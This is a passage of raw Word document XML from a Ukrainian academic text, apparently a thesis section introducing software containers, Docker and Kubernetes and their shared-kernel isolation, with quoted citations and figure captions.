          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B0BB1" w:rsidRDefault="000B0BB1" w:rsidP="00BC794C">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p>
    <w:p w:rsidR="00CB205D" w:rsidRDefault="00CB205D" w:rsidP="00CB205D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.3. Контейнери та їх безпека: концепція та реалізація</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64211" w:rsidRPr="00CB205D" w:rsidRDefault="00F64211" w:rsidP="00CB205D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRDefault="00CB205D" w:rsidP="00CB205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CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В останні роки контейнери стали однією з основних технологій для розгортання </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>в сучасних IT-системах</w:t>
      </w:r>
      <w:r w:rsidR="00A06EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рис.1</w:t>
      </w:r>
      <w:r w:rsidR="007F018F" w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.2.</w:t>
      </w:r>
      <w:r w:rsidR="00A06EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007F018F" w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Вони дозволяють ізолювати додатки та їх залежності в окремі середовища, забезпечуючи при цьому високу портативність, масштабованість і ефективність ресурсів. Проте, незважаючи на численні переваги, безпека контейнерів залишається однією з найбільших проблем. У цьому контексті важливо розуміти не лише принципи роботи контейнерів, а й аспекти їх безпеки, потенційні загрози та кращі практики для їх захисту</w:t>
      </w:r>
      <w:r w:rsidR="007F018F" w:rsidRPr="007F018F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06EAF" w:rsidRPr="00CB205D" w:rsidRDefault="00A06EAF" w:rsidP="00A06EAF">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2457450" cy="1517965"/>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73" t="13625" r="5136" b="1460"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2481988" cy="1533122"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06EAF" w:rsidRPr="007F018F" w:rsidRDefault="007F018F" w:rsidP="007F018F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 1.2</w:t>
      </w:r>
      <w:r w:rsidR="00A06EAF" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00A06EAF" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A06EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidR="00A06EAF" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>онтейнери в сучасних IT-системах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRDefault="002865BF" w:rsidP="00CB205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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>В рамках реалізації к</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>онцепці</w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ї контейнерів необхідно зазначити, що </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>це легковажні віртуалізовані середовища, які дозволяють запустити додаток разом із усіма його залежностями (бібліотеками, конфігураціями тощо), при цьому ізолюючи його від інш</w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003560E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЗ</w:t>
      </w:r>
      <w:r w:rsidR="003560E6" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">на хості. Основною технологією для роботи з контейнерами </w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є Linux Containers (LXC)</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, а</w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ле найбільш популярними стали Docker і Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(Рис.</w:t>
      </w:r>
      <w:r w:rsidR="00DC77DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>як рішення для контейнеризації та оркестрації</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [6]</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRDefault="008670DF" w:rsidP="008670DF">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3443799" cy="2540000"/>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9476" cy="2551563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRPr="002865BF" w:rsidRDefault="002865BF" w:rsidP="008670DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3. –</w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Контейнер</w:t>
      </w:r>
      <w:r w:rsidR="008670DF" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Docker і Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRDefault="008670DF" w:rsidP="008670DF">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p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="002865BF" w:rsidP="00CB205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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008670DF" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Важливо наголосити, що контейнер не включає в себе власну </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="008670DF" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, як це робить традиційна віртуалізація, а використовує ядро хост-системи, спільно з іншими контейнерами, поділяючи ресурси.</w:t>
      </w:r>
      <w:r w:rsidR="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Це робить контейнери більш легкими і швидкими для запуску порівняно з віртуальними машинами. Кожен контейнер працює в окремому процесі з власним файловим простором, але спільним ядром з іншими контейнерами</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [7]</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRPr="008670DF" w:rsidRDefault="002865BF" w:rsidP="008670DF">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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008670DF" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Контейнерна технологія базується на ряді потужних механізмів ядра Linux, які забезпечують ефективну ізоляцію та керування ресурсами. До основних з них відносяться</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [7]</w:t>
      </w:r>
